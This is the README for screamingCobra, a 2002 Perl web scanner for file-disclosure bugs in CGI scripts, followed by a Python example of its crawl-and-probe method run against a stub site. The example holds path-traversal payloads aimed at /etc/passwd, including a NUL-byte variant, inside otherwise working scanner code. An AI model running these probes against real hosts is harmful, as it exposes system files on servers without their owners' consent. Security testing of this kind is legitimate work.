screamingCobra v1.04 -- < January 12, 2002 >
by Samy Kamkar [commport5@LucidX.com]

usage: screamingCobra.pl [-e] [-i] [-s|-v] host[:port][/start/page]

=======================
== TABLE OF CONTENTS ==
=======================

1. What is screamingCobra
2. What screamingCobra does
3. Why was screamingCobra written
4. Configuring screamingCobra
   A. Basic Configuration
   B. Adding Techniques
5. Command-line options
6. Supported Operating Systems

=======================


_____________________________
1. __ WHAT IS SCREAMING COBRA __
=============================

Any CGI that doesn't check the arguments passed to it over the web is
potentially vulnerable to attacks which let a malicious user get read access
to almost any file on that system, if not the ability to execute programs.
screamingCobra is almost always able to find those bugs REMOTELY, because
programmers keep making the same common errors.

screamingCobra is an application for remote vulnerability discovery in ANY
UNKNOWN web application, such as CGIs and PHP pages. Simply put, it attempts
to find vulnerabilities in all web applications on a host without knowing
anything about the applications beforehand.

Modern CGI scanners scan a host for CGIs with KNOWN vulnerabilities.
screamingCobra is able to 'find' the actual vulnerabilities in ANY CGI,
whether it has been discovered before or not.


_______________________________
2. __ WHAT SCREAMING COBRA DOES __
===============================

I've even been told by administrators of very well known sites that they've
been able to use screamingCobra (originally called crawl5b, before this
release) and find at least one bug which allows anyone to get read access to
almost any file on the system, if not access to execute applications.

When you launch screamingCobra, it crawls the specified host over the web and
attempts to find all the CGIs, or any other applications, to which parameters
can be passed. It then tries a few techniques against each parameter to read
files on that machine.

By default, it attempts to read /etc/passwd, and if successful it displays
the exact URL it used to access the file.


_____________________________________
3. __ WHY WAS SCREAMING COBRA WRITTEN __
=====================================

The core was originally written at DefCon 9, specifically at Caezar's
Challenge V, for Challenge B: "identify hypothetical cases of common bugs in
server-side programs and then to describe algorithms that could detect those
problems from a special version of the client software". I did just that, and
wrote a program to go along with it.

Caezar's Challenge: http://caezarschallenge.org


_________________________________
4. __ CONFIGURING SCREAMING COBRA __
=================================

A. -- BASIC CONFIGURATION --

There's not much, if any, configuring to be done. Still, there are some
things you may want to change; I'll go over those now. Open up
screamingCobra.pl in a text editor and check these lines out:

Line 29: this is the file it will attempt to access. Change 'etc/passwd' to,
         say, 'bin/ls' to attempt to read /bin/ls. I recommend KEEPING
         /etc/passwd as the default: it exists on practically every UNIX
         host, is world-readable, and its contents are easy to recognize in a
         response.

Line 30: this is the additional technique for finding vulnerabilities. Leave
         it alone if you don't know what it's doing :)

Line 32: @first -- the HTML tags to look for that contain URLs. The array, by
         default, includes 'a' (anchor tags, i.e. links).

Line 40: @ignore -- extensions of files not to do a GET on, just because they
         usually don't contain HTML and are a waste of bandwidth.

Line 45: @requests -- the basic header that's sent to the server when
         requesting a page or CGI. screamingCobra randomly chooses one for
         each GET it does; add more, following the two default ones.

That's it! You probably didn't have to change or add anything, but it's good
to know how to.


B. -- ADDING TECHNIQUES --

Adding techniques and using them is very simple! First, find where the
'$technique1' variable is set (by default, it's at line 29). After all the
variables in that section that begin with 'technique' and end in a number,
add a new one, incrementing the number by 1. For example, if you have a fresh
screamingCobra.pl, you would stick in:

$technique3 = "your technique to be GET'd";

The 3 is because there are already two other techniques. Now, to actually use
the 3rd technique (together with all techniques whose number is less than 3,
i.e. 2 and 1), you must pass that many '-e's when running screamingCobra. For
example, to run screamingCobra using technique 3, you would run:

./screamingCobra.pl -eee http://host.name

You may of course use any other arguments as well, and whatever
host/port/page you want to.


__________________________
5. __ COMMAND-LINE OPTIONS __
==========================

usage: screamingCobra.pl [-e] [-i] [-s|-v] host[:port][/start/page]

-e: EXTRA TECHNIQUES
    Uses multiple techniques to find bugs. This will take over twice the
    amount of time to complete a scan, and the other techniques used with
    this option are not commonly found in applications, but if you need to do
    a very thorough pen test, you may want to use this option. Each
    additional -e enables the next technique (see section 4B).

-i: DON'T IGNORE ANY FILES
    In the program there is a user-configurable array of extensions to ignore
    (not to GET). Those include images, compressed files, etc. This is
    because those files will usually not be HTML pages, so there won't be any
    useful data in them, and they may take up a lot of bandwidth as well.
    With this option the list is bypassed and screamingCobra will not ignore
    any files.

-s: STATUS BAR
    This creates a status bar with constantly updated counts of pages
    accessed, bugs found and attempted vulnerability scans. Cannot be used
    with verbose, although the status bar is ALWAYS displayed when the user
    unexpectedly exits or kills the application (^C) or when the application
    has finished crawling.

-v: VERBOSE
    This will display all the files being accessed and will also list when
    CGIs are found and attempted to be broken (to find vulnerabilities).
    Cannot be used with the status bar, although a status bar is ALWAYS
    displayed when the user unexpectedly exits or kills the application (^C)
    or when the application has finished crawling.

host: Hostname or IP of the host to scan. [REQUIRED]
    For example, http://cobra.LucidX.com

[:port]: Port to connect to; the default is 80.
    For example, http://cobra.LucidX.com:80

[/start/page]: Page to start on.
    For example, http://cobra.LucidX.com/screamingCobra-1.03/
    and also, http://cobra.LucidX.com:80/index.html


__________________________________
6. __ SUPPORTED OPERATING SYSTEMS __
==================================

screamingCobra will work on ANY operating system that has Perl 5.x. I also
compiled a binary for Windows, sCobra-WIN.exe. This will be recompiled for
every new version of screamingCobra and will be included in all releases.


===================
== END OF README ==
===================

That's all for now. Contact me (Samy Kamkar) at commport5@LucidX.com for
questions or comments, hope to hear from you all! :)
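The crawl-then-probe loop that sections 2 and 4B describe (find every URL that takes parameters, swap each parameter for a technique string, GET it, and report the URL if the response looks like /etc/passwd), as an added Python example. This is not screamingCobra.pl, which is Perl, and the README never prints its real $technique1/$technique2 strings; the two probe strings below (a plain "../" traversal, and the same with a trailing NUL for CGIs that append a suffix), the view.cgi stub with its appended ".html", the hostname cobra.LucidX.com reused from section 5, and the pages in SITE are all assumptions constructed so the example runs offline.

```python
import posixpath
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode, urljoin, urlparse, urlunparse

TARGET_FILE = "etc/passwd"            # the "Line 29" value from section 4A
TRAVERSAL = "../" * 8 + TARGET_FILE
# Assumed technique strings, in -e order: technique 1 is plain traversal;
# technique 2 (needs one -e) appends a NUL so a CGI that tacks a suffix onto
# the parameter still opens the target file.
TECHNIQUES = [TRAVERSAL, TRAVERSAL + "\x00"]

# Extensions skipped unless -i is given (the README's @ignore idea).
IGNORE_EXT = (".gif", ".jpg", ".png", ".zip", ".gz", ".tar")

# Constructed mini-site standing in for a live host: path -> HTML body.
SITE = {
    "/index.html": '<a href="view.cgi?page=about">about</a>'
                   '<a href="logo.gif">logo</a><a href="/docs/">docs</a>',
    "/docs/": '<a href="../view.cgi?page=help&lang=en">help</a>',
}
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)   # first line of /etc/passwd


def fake_get(url):
    """Stand-in for the HTTP GET. The view.cgi stub builds a filename from
    the 'page' parameter and appends '.html' without any validation (the bug
    class from section 1); the split on NUL mimics a C open() truncating
    the string, which is what makes technique 2 succeed where 1 fails."""
    p = urlparse(url)
    if p.path.endswith("/view.cgi"):
        page = dict(parse_qsl(p.query)).get("page", "")
        raw = ("/var/www/pages/" + page + ".html").split("\x00")[0]
        if posixpath.normpath(raw) == "/etc/passwd":
            return "root:x:0:0:root:/root:/bin/sh\nnobody:x:65534:65534::/:/bin/false\n"
        return "<html>no such page</html>"
    return SITE.get(p.path, "")


class LinkParser(HTMLParser):
    """Collects href attributes from <a> tags (the README's default @first)."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links.extend(v for k, v in attrs if k == "href" and v)


def crawl(start, get=fake_get, dont_ignore=False):
    """Breadth-first crawl restricted to one host; returns every URL that
    carries a query string, since those are the only ones worth probing."""
    host = urlparse(start).netloc
    seen, queue, targets = set(), [start], []
    while queue:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        p = urlparse(url)
        if p.netloc != host:
            continue
        if not dont_ignore and p.path.lower().endswith(IGNORE_EXT):
            continue                      # the -i switch disables this skip
        if p.query:
            targets.append(url)
        parser = LinkParser()
        parser.feed(get(url))
        queue.extend(urljoin(url, link) for link in parser.links)
    return targets


def probe(url, extra=0, get=fake_get):
    """Substitute every enabled technique into each parameter in turn
    (technique 1 always, one more per -e) and return the URLs whose
    response matched /etc/passwd, as the README says the tool prints."""
    enabled = TECHNIQUES[:1 + extra]
    p = urlparse(url)
    params = parse_qsl(p.query, keep_blank_values=True)
    hits = []
    for i, (name, _) in enumerate(params):
        for tech in enabled:
            trial = list(params)
            trial[i] = (name, tech)
            probe_url = urlunparse(p._replace(query=urlencode(trial)))
            if PASSWD_RE.search(get(probe_url)):
                hits.append(probe_url)
    return hits


def scan(start, extra=0, dont_ignore=False, get=fake_get):
    """Whole run: crawl, then probe each parameterised URL."""
    hits = []
    for url in crawl(start, get, dont_ignore):
        hits.extend(probe(url, extra, get))
    return hits


if __name__ == "__main__":
    for hit in scan("http://cobra.LucidX.com/index.html", extra=1):
        print("VULNERABLE:", hit)
```

Against the constructed site, a default run (technique 1 only) finds nothing because the stub appends ".html" to the traversal; a run with one -e finds the 'page' parameter of both view.cgi links and leaves 'lang' alone, which is the trade-off the -e description makes: less common techniques, more requests, more bugs.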